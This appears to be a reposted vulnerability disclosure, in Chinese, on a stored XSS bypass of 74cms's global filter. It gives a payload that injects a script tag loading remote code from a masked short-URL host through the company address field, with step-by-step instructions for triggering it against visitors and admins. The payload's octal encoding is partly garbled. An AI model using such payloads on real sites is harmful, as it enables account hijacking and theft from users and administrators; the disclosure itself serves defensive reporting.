74cms(20141027)全局xss防护考虑不完善可被绕过

  • A+
所属分类:漏洞时代
摘要

防护代码就不贴出来了,代码中只考虑了 新建标签的情况 或者在a img之类的标签节点中。


漏洞作者: 路人甲

防护代码就不贴出来了,

代码中只考虑了 新建标签的情况 或者在a img之类的标签节点中。

但是没有考虑下面这种的情况

<script> Var xx=”qiyeid”; </script>

这样的话,我们就可以这样利用

<script> Var xx=”qiyeid”;eval(‘documnet.write(js 8进制编码)’)// </script>

漏洞证明:

正好找到了一处存储xss。

直接贴利用方法

先来注册一个企业帐号

74cms(20141027)全局xss防护考虑不完善可被绕过

 

http://localhost/74/user/company/company_info.php?act=company_profile

重点利用在详细地址这,不过我们需要设置一下input的长度大一点 。默认长度为80,但是数据库中为250。

然后插上我们的代码。

",opts);eval('document.write("/74/163cript//163rc=//t.cn/*****/76/74//163cript/76")')//

74cms(20141027)全局xss防护考虑不完善可被绕过

保存

然后再去地图标注一下企业的位置,

http://localhost/74/user/company/company_info.php?act=company_map_set

74cms(20141027)全局xss防护考虑不完善可被绕过

这个位置就随意了。

然后等用户查看企业时 或者管理员在后台审核企业时

74cms(20141027)全局xss防护考虑不完善可被绕过

 

会打开如下url http://localhost/74/company/company-show.php?id=1(前台也可见,为企业的展示页面)

74cms(20141027)全局xss防护考虑不完善可被绕过

修复方案:

把在script中的情况也考虑下。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: